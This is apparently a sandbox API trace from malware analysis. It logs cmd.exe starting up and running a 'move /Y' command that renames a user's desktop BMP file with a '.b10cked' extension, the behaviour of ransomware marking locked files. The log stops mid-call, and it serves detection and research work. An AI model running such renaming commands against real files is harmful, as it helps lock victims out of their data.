GetModuleHandleA (lpModuleName=0x0) returned 0x49e00000 [0225.487] __set_app_type (_Type=0x1) [0225.487] __p__fmode () returned 0x76b331f4 [0225.487] __p__commode () returned 0x76b331fc [0225.487] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49e221a6) returned 0x0 [0225.487] __getmainargs (in: _Argc=0x49e24238, _Argv=0x49e24240, _Env=0x49e2423c, _DoWildCard=0, _StartInfo=0x49e24140 | out: _Argc=0x49e24238, _Argv=0x49e24240, _Env=0x49e2423c) returned 0 [0225.488] GetCurrentThreadId () returned 0x6fc [0225.488] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x6fc) returned 0x38 [0225.488] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0225.488] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0225.488] SetThreadUILanguage (LangId=0x0) returned 0x409 [0225.488] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0225.488] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2efa74 | out: phkResult=0x2efa74*=0x0) returned 0x2 [0225.488] VirtualQuery (in: lpAddress=0x2efaab, lpBuffer=0x2efa44, dwLength=0x1c | out: lpBuffer=0x2efa44*(BaseAddress=0x2ef000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0225.488] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x2efa44, dwLength=0x1c | out: lpBuffer=0x2efa44*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0225.488] VirtualQuery (in: lpAddress=0x1f1000, lpBuffer=0x2efa44, dwLength=0x1c | out: lpBuffer=0x2efa44*(BaseAddress=0x1f1000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0225.488] VirtualQuery (in: lpAddress=0x1f3000, lpBuffer=0x2efa44, dwLength=0x1c | out: lpBuffer=0x2efa44*(BaseAddress=0x1f3000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0225.488] VirtualQuery (in: lpAddress=0x2f0000, lpBuffer=0x2efa44, dwLength=0x1c | out: lpBuffer=0x2efa44*(BaseAddress=0x2f0000, AllocationBase=0x2f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0225.488] GetConsoleOutputCP () returned 0x1b5 [0225.489] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e24260 | out: lpCPInfo=0x49e24260) returned 1 [0225.489] SetConsoleCtrlHandler (HandlerRoutine=0x49e1e72a, Add=1) returned 1 [0225.489] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.489] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0225.489] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.489] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49e241ac | out: lpMode=0x49e241ac) returned 1 [0225.489] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.489] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0225.489] _get_osfhandle (_FileHandle=0) returned 0x3 [0225.489] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49e241b0 | out: lpMode=0x49e241b0) returned 1 [0225.490] _get_osfhandle (_FileHandle=0) returned 0x3 [0225.490] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0225.490] GetEnvironmentStringsW () returned 0xe0168* [0225.490] FreeEnvironmentStringsW (penv=0xe0168) returned 1 [0225.490] GetEnvironmentStringsW () returned 0xe0168* [0225.490] FreeEnvironmentStringsW (penv=0xe0168) returned 1 [0225.490] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ee9e4 | out: phkResult=0x2ee9e4*=0x40) returned 0x0 [0225.490] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ee9ec, lpData=0x2ee9f0, lpcbData=0x2ee9e8*=0x1000 | out: lpType=0x2ee9ec*=0x0, lpData=0x2ee9f0*=0x90, lpcbData=0x2ee9e8*=0x1000) returned 0x2 [0225.490] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ee9ec, lpData=0x2ee9f0, lpcbData=0x2ee9e8*=0x1000 | out: lpType=0x2ee9ec*=0x4, lpData=0x2ee9f0*=0x1, lpcbData=0x2ee9e8*=0x4) returned 0x0 [0225.491] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ee9ec, lpData=0x2ee9f0, lpcbData=0x2ee9e8*=0x1000 | out: lpType=0x2ee9ec*=0x0, lpData=0x2ee9f0*=0x1, lpcbData=0x2ee9e8*=0x1000) returned 0x2 [0225.491] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ee9ec, lpData=0x2ee9f0, lpcbData=0x2ee9e8*=0x1000 | out: lpType=0x2ee9ec*=0x4, lpData=0x2ee9f0*=0x0, lpcbData=0x2ee9e8*=0x4) returned 0x0 [0225.491] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ee9ec, lpData=0x2ee9f0, lpcbData=0x2ee9e8*=0x1000 | out: lpType=0x2ee9ec*=0x4, lpData=0x2ee9f0*=0x40, lpcbData=0x2ee9e8*=0x4) returned 0x0 [0225.491] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ee9ec, lpData=0x2ee9f0, lpcbData=0x2ee9e8*=0x1000 | out: lpType=0x2ee9ec*=0x4, lpData=0x2ee9f0*=0x40, lpcbData=0x2ee9e8*=0x4) returned 0x0 [0225.491] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ee9ec, lpData=0x2ee9f0, lpcbData=0x2ee9e8*=0x1000 | out: lpType=0x2ee9ec*=0x0, lpData=0x2ee9f0*=0x40, lpcbData=0x2ee9e8*=0x1000) returned 0x2 [0225.491] RegCloseKey (hKey=0x40) returned 0x0 [0225.491] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ee9e4 | out: phkResult=0x2ee9e4*=0x40) returned 0x0 [0225.491] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ee9ec, lpData=0x2ee9f0, lpcbData=0x2ee9e8*=0x1000 | out: lpType=0x2ee9ec*=0x0, lpData=0x2ee9f0*=0x40, lpcbData=0x2ee9e8*=0x1000) returned 0x2 [0225.491] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ee9ec, lpData=0x2ee9f0, lpcbData=0x2ee9e8*=0x1000 | out: lpType=0x2ee9ec*=0x4, lpData=0x2ee9f0*=0x1, lpcbData=0x2ee9e8*=0x4) returned 0x0 [0225.491] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ee9ec, lpData=0x2ee9f0, lpcbData=0x2ee9e8*=0x1000 | out: lpType=0x2ee9ec*=0x0, lpData=0x2ee9f0*=0x1, lpcbData=0x2ee9e8*=0x1000) returned 0x2 [0225.491] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ee9ec, lpData=0x2ee9f0, lpcbData=0x2ee9e8*=0x1000 | out: lpType=0x2ee9ec*=0x4, lpData=0x2ee9f0*=0x0, lpcbData=0x2ee9e8*=0x4) returned 0x0 [0225.491] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ee9ec, lpData=0x2ee9f0, lpcbData=0x2ee9e8*=0x1000 | out: lpType=0x2ee9ec*=0x4, lpData=0x2ee9f0*=0x9, lpcbData=0x2ee9e8*=0x4) returned 0x0 [0225.491] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ee9ec, lpData=0x2ee9f0, lpcbData=0x2ee9e8*=0x1000 | out: lpType=0x2ee9ec*=0x4, lpData=0x2ee9f0*=0x9, lpcbData=0x2ee9e8*=0x4) returned 0x0 [0225.491] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ee9ec, lpData=0x2ee9f0, lpcbData=0x2ee9e8*=0x1000 | out: lpType=0x2ee9ec*=0x0, lpData=0x2ee9f0*=0x9, lpcbData=0x2ee9e8*=0x1000) returned 0x2 [0225.491] RegCloseKey (hKey=0x40) returned 0x0 [0225.491] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863b9 [0225.491] srand (_Seed=0x5b8863b9) [0225.491] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\GCAP-7~1.BMP\" \"C:\\Users\\EEBsYm5\\Desktop\\gcAp-7-i61tX.bmp.b10cked\"" [0225.491] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\GCAP-7~1.BMP\" \"C:\\Users\\EEBsYm5\\Desktop\\gcAp-7-i61tX.bmp.b10cked\"" [0225.492] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49e25260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0225.492] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xe18c8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0225.492] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0225.492] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0225.492] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0225.492] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0225.492] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0225.492] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0225.492] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0225.492] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0225.493] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0225.493] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0225.493] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0225.493] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0225.493] GetEnvironmentStringsW () returned 0xe22b8* [0225.493] FreeEnvironmentStringsW (penv=0xe22b8) returned 1 [0225.493] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0225.493] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0225.493] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0225.493] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0225.493] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0225.493] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0225.493] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0225.493] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0225.493] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0225.493] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0225.493] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2ef7b0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0225.493] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2ef7b0, lpFilePart=0x2ef7ac | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2ef7ac*="Desktop") returned 0x18 [0225.493] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0225.494] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2ef52c | out: lpFindFileData=0x2ef52c) returned 0xdfff8 [0225.494] FindClose (in: hFindFile=0xdfff8 | out: hFindFile=0xdfff8) returned 1 [0225.494] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2ef52c | out: lpFindFileData=0x2ef52c) returned 0xdfff8 [0225.494] FindClose (in: hFindFile=0xdfff8 | out: hFindFile=0xdfff8) returned 1 [0225.494] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2ef52c | out: lpFindFileData=0x2ef52c) returned 0xdfff8 [0225.494] FindClose (in: hFindFile=0xdfff8 | out: hFindFile=0xdfff8) returned 1 [0225.494] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0225.494] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0225.495] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0225.495] GetEnvironmentStringsW () returned 0xe2ad8* [0225.495] FreeEnvironmentStringsW (penv=0xe2ad8) returned 1 [0225.495] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49e25260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0225.495] GetConsoleOutputCP () returned 0x1b5 [0225.496] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e24260 | out: lpCPInfo=0x49e24260) returned 1 [0225.496] GetUserDefaultLCID () returned 0x409 [0225.496] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49e24950, cchData=8 | out: lpLCData=":") returned 2 [0225.496] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2ef8f0, cchData=128 | out: lpLCData="0") returned 2 [0225.496] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2ef8f0, cchData=128 | out: lpLCData="0") returned 2 [0225.496] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2ef8f0, cchData=128 | out: lpLCData="1") returned 2 [0225.496] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49e24940, cchData=8 | out: lpLCData="/") returned 2 [0225.496] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49e24d80, cchData=32 | out: lpLCData="Mon") returned 4 [0225.496] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49e24d40, cchData=32 | out: lpLCData="Tue") returned 4 [0225.496] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49e24d00, cchData=32 | out: lpLCData="Wed") returned 4 [0225.497] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49e24cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0225.497] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49e24c80, cchData=32 | out: lpLCData="Fri") returned 4 [0225.497] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49e24c40, cchData=32 | out: lpLCData="Sat") returned 4 [0225.497] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49e24c00, cchData=32 | out: lpLCData="Sun") returned 4 [0225.497] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49e24930, cchData=8 | out: lpLCData=".") returned 2 [0225.497] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49e24920, cchData=8 | out: lpLCData=",") returned 2 [0225.497] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0225.498] GetConsoleTitleW (in: lpConsoleTitle=0xd08d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0225.498] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0225.498] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0225.498] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0225.498] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0225.499] _wcsicmp (_String1="move", _String2=")") returned 68 [0225.499] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0225.499] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0225.499] _wcsicmp (_String1="IF", _String2="move") returned -4 [0225.499] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0225.499] _wcsicmp (_String1="REM", _String2="move") returned 5 [0225.499] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0225.502] GetConsoleTitleW (in: lpConsoleTitle=0x2ef5e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0225.635] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0225.635] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0225.635] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0225.635] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0225.635] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0225.635] _wcsicmp (_String1="move", _String2="CD") returned 10 [0225.635] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0225.635] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0225.635] _wcsicmp (_String1="move", _String2="REN") returned -5 [0225.635] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0225.635] _wcsicmp (_String1="move", _String2="SET") returned -6 [0225.635] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0225.635] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0225.635] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0225.635] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0225.635] _wcsicmp (_String1="move", _String2="MD") returned 11 [0225.635] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0225.635] _wcsicmp (_String1="move", _String2="RD") returned -5 [0225.635] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0225.635] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0225.635] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0225.635] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0225.635] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0225.635] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0225.636] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0225.636] _wcsicmp (_String1="move", _String2="VER") returned -9 [0225.636] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0225.636] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0225.636] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0225.636] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0225.636] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0225.636] _wcsicmp (_String1="move", _String2="START") returned -6 [0225.636] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0225.636] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0225.636] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0225.638] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0225.638] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0225.638] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2ef3a4, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x2ef39c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2ef39c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0225.638] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0225.638] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0225.638] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0225.638] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0225.638] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0225.638] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0225.638] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0225.638] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0225.638] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0225.638] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0225.639] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0225.639] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0225.639] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0225.639] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0225.639] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0225.639] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0225.639] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0225.639] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0225.639] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0225.639] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0225.639] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0225.639] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0225.639] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0225.639] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0225.639] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0225.639] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0225.639] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0225.639] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0225.639] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0225.639] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0225.639] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0225.639] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0225.639] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0225.640] _wcsicmp (_String1="GCAP-7~1.BMP", _String2=".") returned 57 [0225.640] _wcsicmp (_String1="GCAP-7~1.BMP", _String2="..") returned 57 [0225.640] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GCAP-7~1.BMP" (normalized: "c:\\users\\eebsym5\\desktop\\gcap-7~1.bmp")) returned 0x20 [0225.640] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xe1d40 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0225.640] SetErrorMode (uMode=0x0) returned 0x0 [0225.640] SetErrorMode (uMode=0x1) returned 0x0 [0225.640] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GCAP-7~1.BMP", nBufferLength=0x104, lpBuffer=0x2eed2c, lpFilePart=0x2eed14 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\GCAP-7~1.BMP", lpFilePart=0x2eed14*="GCAP-7~1.BMP") returned 0x25 [0225.640] SetErrorMode (uMode=0x0) returned 0x1 [0225.640] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0225.640] _wcsicmp (_String1="GCAP-7~1.BMP", _String2=".") returned 57 [0225.640] _wcsicmp (_String1="GCAP-7~1.BMP", _String2="..") returned 57 [0225.640] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GCAP-7~1.BMP" (normalized: "c:\\users\\eebsym5\\desktop\\gcap-7~1.bmp")) returned 0x20 [0225.641] SetErrorMode (uMode=0x0) returned 0x0 [0225.641] SetErrorMode (uMode=0x1) returned 0x0 [0225.641] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GCAP-7~1.BMP", nBufferLength=0x104, lpBuffer=0x2ef1a8, lpFilePart=0x2eef40 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\GCAP-7~1.BMP", lpFilePart=0x2eef40*="GCAP-7~1.BMP") returned 0x25 [0225.641] SetErrorMode (uMode=0x0) returned 0x1 [0225.641] SetErrorMode (uMode=0x0) returned 0x0 [0225.641] SetErrorMode (uMode=0x1) returned 0x0 [0225.641] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\gcAp-7-i61tX.bmp.b10cked", nBufferLength=0x104, lpBuffer=0x2ef3b0, lpFilePart=0x2eef40 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\gcAp-7-i61tX.bmp.b10cked", lpFilePart=0x2eef40*="gcAp-7-i61tX.bmp.b10cked") returned 0x31 [0225.641] SetErrorMode (uMode=0x0) returned 0x1 [0225.641] SetLastError (dwErrCode=0x0) [0225.641] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\gcAp-7-i61tX.bmp.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\gcap-7-i61tx.bmp.b10cked")) returned 0xffffffff [0225.641] GetLastError () returned 0x2 [0225.641] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GCAP-7~1.BMP", fInfoLevelId=0x1, lpFindFileData=0x2ee8bc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ee8bc) returned 0xd0ef8 [0225.641] FindNextFileW (in: hFindFile=0xd0ef8, lpFindFileData=0x2ee8bc | out: lpFindFileData=0x2ee8bc) returned 0 [0225.642] GetLastError () returned 0x12 [0225.642] FindClose (in: hFindFile=0xd0ef8 | out: hFindFile=0xd0ef8) returned 1 [0225.643] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GCAP-7~1.BMP", fInfoLevelId=0x1, lpFindFileData=0xe1ae0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xe1ae0) returned 0xd0ef8 [0225.643] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\gcAp-7-i61tX.bmp.b10cked", nBufferLength=0x104, lpBuffer=0x2eeb54, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\gcAp-7-i61tX.bmp.b10cked", lpFilePart=0x0) returned 0x31 [0225.643] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\gcAp-7-i61tX.bmp", nBufferLength=0x104, lpBuffer=0x2eeb54, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\gcAp-7-i61tX.bmp", lpFilePart=0x0) returned 0x29 [0225.643] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\gcAp-7-i61tX.bmp" (normalized: "c:\\users\\eebsym5\\desktop\\gcap-7-i61tx.bmp")) returned 0x20 [0225.643] MoveFileExW 